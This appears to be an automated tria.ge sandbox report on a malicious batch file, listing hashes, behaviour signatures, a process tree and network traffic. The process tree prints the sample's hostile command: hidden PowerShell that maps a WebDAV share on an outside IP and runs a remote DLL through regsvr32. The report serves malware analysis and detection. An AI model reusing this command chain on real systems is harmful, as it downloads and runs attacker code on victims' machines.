Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

9a6242ef51...db.bat

windows7-x64

8

9a6242ef51...db.bat

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/07/2024, 03:32 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9a6242ef5182a2d4fb5827d12443ca9456c7279a64ebf570a9f9c821e26518db.bat

  • Size

    16KB

  • MD5

    ce0ac37cf9c24a5a5527149f1e34e2a0

  • SHA1

    a4d0fd98848dc2c796c5a31658dc99b589fa26b3

  • SHA256

    9a6242ef5182a2d4fb5827d12443ca9456c7279a64ebf570a9f9c821e26518db

  • SHA512

    172de7b43cee00e9234178ae84f9f3240cc14191a9837eda5d631609e7e286635ed29ab81805dfc929bfb847b3381e73de691fb9bb5db01da7b338516fe7513f

  • SSDEEP

    384:Xz9qBHwPuI0miD120Tt0WxKJPmmCzTw+uXFktL:XzgovK0WcJPmHzy4

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9a6242ef5182a2d4fb5827d12443ca9456c7279a64ebf570a9f9c821e26518db.bat"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Program Files\Windows NT\Accessories\wordpad.exe
      "C:\Program Files\Windows NT\Accessories\wordpad.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:1588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\41641989930996.dll
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:212
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\41641989930996.dll
          3⤵
            PID:4964
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
        1⤵
          PID:4056

        Network

        • flag-us
          DNS
          97.17.167.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          97.17.167.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          64.159.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          64.159.190.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          88.156.103.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          88.156.103.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          58.55.71.13.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          58.55.71.13.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          50.23.12.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          50.23.12.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          15.164.165.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          15.164.165.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          86.23.85.13.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          86.23.85.13.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          147.142.123.92.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          147.142.123.92.in-addr.arpa
          IN PTR
          Response
          147.142.123.92.in-addr.arpa
          IN PTR
          a92-123-142-147deploystaticakamaitechnologiescom
        • flag-us
          DNS
          172.214.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.214.232.199.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          tse1.mm.bing.net
          Remote address:
          8.8.8.8:53
          Request
          tse1.mm.bing.net
          IN A
          Response
          tse1.mm.bing.net
          IN CNAME
          mm-mm.bing.net.trafficmanager.net
          mm-mm.bing.net.trafficmanager.net
          IN CNAME
          ax-0001.ax-msedge.net
          ax-0001.ax-msedge.net
          IN A
          150.171.27.10
          ax-0001.ax-msedge.net
          IN A
          150.171.28.10
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 746576
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 4B835B95575847B0BB3DC6C3E8C23DE5 Ref B: LON04EDGE1113 Ref C: 2024-07-19T03:34:04Z
          date: Fri, 19 Jul 2024 03:34:03 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239339388112_1D9RCOGNLARU8ARO7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239339388112_1D9RCOGNLARU8ARO7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 657438
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: A703DA4ECAAF4FEEBD6AA04537D4F807 Ref B: LON04EDGE1113 Ref C: 2024-07-19T03:34:04Z
          date: Fri, 19 Jul 2024 03:34:03 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239340418549_1ZU8FEFK0ERHP4923&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239340418549_1ZU8FEFK0ERHP4923&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 352234
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: B0F34A2F1C7B4C4B80B79B36B83566A3 Ref B: LON04EDGE1113 Ref C: 2024-07-19T03:34:04Z
          date: Fri, 19 Jul 2024 03:34:03 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239339388111_1XGVGDXXGM4UED7TP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239339388111_1XGVGDXXGM4UED7TP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 360094
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: C5A9FDA0C2684D7E8D22E4ABFBD609A7 Ref B: LON04EDGE1113 Ref C: 2024-07-19T03:34:04Z
          date: Fri, 19 Jul 2024 03:34:03 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239340418550_1B8YD3DMBL24NYO16&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239340418550_1B8YD3DMBL24NYO16&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 439986
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 677949F451474AD384776515F5361800 Ref B: LON04EDGE1113 Ref C: 2024-07-19T03:34:04Z
          date: Fri, 19 Jul 2024 03:34:03 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 411186
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 842AC8E72D194FA494000A93831D40B2 Ref B: LON04EDGE1113 Ref C: 2024-07-19T03:34:04Z
          date: Fri, 19 Jul 2024 03:34:03 GMT
        • flag-us
          DNS
          55.36.223.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          55.36.223.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          211.143.182.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          211.143.182.52.in-addr.arpa
          IN PTR
          Response
        • 150.171.27.10:443
          https://tse1.mm.bing.net/th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
          tls, http2
          108.2kB
           3.1MB
           2236
          2232

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239339388112_1D9RCOGNLARU8ARO7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239340418549_1ZU8FEFK0ERHP4923&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239339388111_1XGVGDXXGM4UED7TP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239340418550_1B8YD3DMBL24NYO16&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

          HTTP Response

          200
        • 150.171.27.10:443
          tse1.mm.bing.net
          tls, http2
          1.2kB
           6.9kB
           15
          13
        • 150.171.27.10:443
          tse1.mm.bing.net
          tls, http2
          1.2kB
           6.9kB
           15
          13
        • 150.171.27.10:443
          tse1.mm.bing.net
          tls, http2
          1.2kB
           6.9kB
           15
          13
        • 150.171.27.10:443
          tse1.mm.bing.net
          tls, http2
          1.2kB
           6.9kB
           15
          13
        • 8.8.8.8:53
          97.17.167.52.in-addr.arpa
          dns
          71 B
           145 B
           1
          1

          DNS Request

          97.17.167.52.in-addr.arpa

        • 8.8.8.8:53
          64.159.190.20.in-addr.arpa
          dns
          72 B
           158 B
           1
          1

          DNS Request

          64.159.190.20.in-addr.arpa

        • 8.8.8.8:53
          88.156.103.20.in-addr.arpa
          dns
          72 B
           158 B
           1
          1

          DNS Request

          88.156.103.20.in-addr.arpa

        • 8.8.8.8:53
          58.55.71.13.in-addr.arpa
          dns
          70 B
           144 B
           1
          1

          DNS Request

          58.55.71.13.in-addr.arpa

        • 8.8.8.8:53
          50.23.12.20.in-addr.arpa
          dns
          70 B
           156 B
           1
          1

          DNS Request

          50.23.12.20.in-addr.arpa

        • 8.8.8.8:53
          15.164.165.52.in-addr.arpa
          dns
          72 B
           146 B
           1
          1

          DNS Request

          15.164.165.52.in-addr.arpa

        • 8.8.8.8:53
          86.23.85.13.in-addr.arpa
          dns
          70 B
           144 B
           1
          1

          DNS Request

          86.23.85.13.in-addr.arpa

        • 8.8.8.8:53
          147.142.123.92.in-addr.arpa
          dns
          73 B
           139 B
           1
          1

          DNS Request

          147.142.123.92.in-addr.arpa

        • 8.8.8.8:53
          172.214.232.199.in-addr.arpa
          dns
          74 B
           128 B
           1
          1

          DNS Request

          172.214.232.199.in-addr.arpa

        • 8.8.8.8:53
          tse1.mm.bing.net
          dns
          62 B
           170 B
           1
          1

          DNS Request

          tse1.mm.bing.net

          DNS Response

          150.171.27.10
          150.171.28.10

        • 8.8.8.8:53
          55.36.223.20.in-addr.arpa
          dns
          71 B
           157 B
           1
          1

          DNS Request

          55.36.223.20.in-addr.arpa

        • 8.8.8.8:53
          211.143.182.52.in-addr.arpa
          dns
          73 B
           147 B
           1
          1

          DNS Request

          211.143.182.52.in-addr.arpa

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zhqynram.h0m.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/3976-0-0x00000127FF7A0000-0x00000127FF7C2000-memory.dmp

          Filesize

          136KB

          Download

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.